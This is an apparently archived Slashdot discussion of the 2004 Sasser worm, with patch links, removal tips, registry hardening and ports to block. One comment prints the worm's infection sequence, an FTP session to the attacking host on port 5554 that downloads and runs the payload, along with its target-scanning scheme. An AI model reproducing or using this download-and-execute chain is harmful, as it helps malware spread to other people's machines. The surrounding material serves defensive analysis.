New Windows Worm on the Loose

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

Removal Instructions

[modifried]

For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

http://www.microsoft.com/security/incident/sasser. asp [microsoft.com]

Re:I Use X Windows

[Anonymous Coward]

What is this 'Windows Update' of which you speak?

its started when you do

# apt-get update && apt-get dist-upgrade

Re:Mutex Trapping

[The Raven]

Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.

However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.

Re:Mutex Trapping

[Joe U]

Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

Imagine running something complex like a database server. Dialog box fun.

The virus writers will just use something else, like a file, if people tracked by mutex.

Re:Mutex Trapping

[Anonymous Coward]

You can set permissions in the registry per key.

Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

Where's Panda?

[RazorX90]

More information at Computer Associates, F-Secure, Symantec and McAfee.

Where's Panda [pandasoftware.com] in that list? Personally I prefer Panda over those.

How it works

[mrneutron]

It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

open XXX.XXX.XXX.XXX 5554

anonymous

user

bin

get XXXXX_up.exe

bye

XXXXX_up.exe

If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

The IP addresses generated by the worm are distributed as follows:

50% are completely random

25% have the same first octet as the IP

address of the infected host

25% have the same first and second octet as the IP address of the infected host.

The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

See:

• http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html

Re:Mutex Trapping

[stef0x77]

Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

Re:Mutex Trapping

[kyhwana]

Err, Startup Monitor [mlin.net] does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

Re:Mutex Trapping

[cscx]

Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.

Note this only works on NT-based systems (e.g., WinXP)

Re:Mutex Trapping

[Verteiron]

It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.

Re:Why use windows update?

[kyhwana]

The patches were released on the 13th of April, there were four patches, of which, put togeather, they patch 20 different vunerabilities.

Re:I Use X Windows

[bamf]

You've probably already installed it, just look for KB835732 in your list of installed updates.

some important points

[R_V_Winkle]

In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

Sasser generates traffic on TCP ports 445, 5554 and 9996.

The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

http://www.microsoft.com/technet/security/bullet in /MS04-011.mspx

Bad Link...Here's the Correct One

[Sangloth]

This link should work for the symantec description of Sasser. [symantec.com] Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.

Re:I Use X Windows

[squall14716]

It's called X Window System, not X Windows. Calling someone an MS fanboy because they point this out is uncalled for. Speaking of which... there are MS fanboys? Are these people out of their minds?

Windows XP SP1 Fixed This!

[Dave419]

Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones. I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this. Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo Box, its time to rebuild again now that 2004.1 came out!!!!

Re:Oh the irony

[BillLeeLee]

I had stopped ZA from starting up by default for the past few days, but I enabled it which allowed me to grab that one patch.

The worm can be removed with McAfee's stinger tool (the Mcafee link has a link to it).

Systems all clear.

Re:Mutex Trapping

[chachob]

WinPatrol [winpatrol.com] does this as well, along with protecting/watching many other aspects of the system for potentially unwanted changes.

Re:I Use X Windows

[pantherace]

That's fine for ONE computer, possibly even easier. (That's debatable, very debatable.) However, it only updates the OS & 1 office suite. If you would be so kind as to tell me about something that allows you to install applications to multiple computers from one on windows that doesn't cost a relatively large amount, such as Norton Ghost (which still requires a fairly complicated install, but fortunately only on one machine)?

SUS again updates only the OS + Office suite, so that doesn't cut it.

I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.

Re:Mutex Trapping

[Foolhardy]

You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).

windows users never fail to amaze me.

[Anonymous Coward]

most of these problems they have (certain virii, spyware adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.

tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...

i've went from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".

Re:I Use X Windows

[GweeDo]

Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?

Re:Security Update Dates

[mrneutron]

Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).

Re:Windows is a joke, but hey, smile.

[TeddyR]

There are several modes for the "automatic" updates; some depend on OS/SP and if you have SUS/WUS installed [microsoft.com]. (if its a work laptop, they may have SUS/WUS configured for the updating process.)

In 2k and XP, you can

1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.

by default its #3.

in 2k, the option can be changed in the control panel (sp3 or higher needed).

in XP, right click on "my computer", properties, go to the automatic updates tab.

Re:Windows XP SP1 Fixed This!

[blincoln]

Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1.

Uh... what?

Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)

if it blocks your favorite removal/anti-virus site

[Xiph]

try using a google cache.
i've told soo many others by so now, so i might as well put it on slashdot

Wow! Bushfire!

[reignbow]

Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection alltogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!

Re:I Use X Windows

[TechniMyoko]

actually, on XP with default settings, commdlg32.dll (or any other system file) will be restored by the OS when you delete it from a backup location

Re:Windows update freaking out!

[Jarnis]

Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...

Re:I Use X Windows

[GbrDead]

you could make a shell script that does it all for you that is set UID root
No, you can't. Linux ignores the suid flag on scripts.

Re:Linux is vunerable too (The anti-anti-windows F

[AnyoneEB]

Then try the full version of Mozilla, which definitely supports the Flash player plugin {though I'm not convinced you aren't just lying, Firefox might well support plugins}. If you don't need Flash, but you would like tabbed browsing, pop-up blocking, a Javascript debugging console, cookie management and speed, then Firefox certainly does it.

FYI, FireFox supports Flash and Java plug-ins fine. All previous versions I've used (since Phoenix v0.4) have supported those plug-ins as well.

Re:ah...

[kasperd]

my vpn server uses one TCP port nya nya.

VPN over TCP will give you performance problems. In fact any tunnel device over TCP will give you performance problems. It is the two instances of TCP in the protocol stack that is responsible for most of the problems. Any VPN system built on TCP is broken, it should be build on UDP.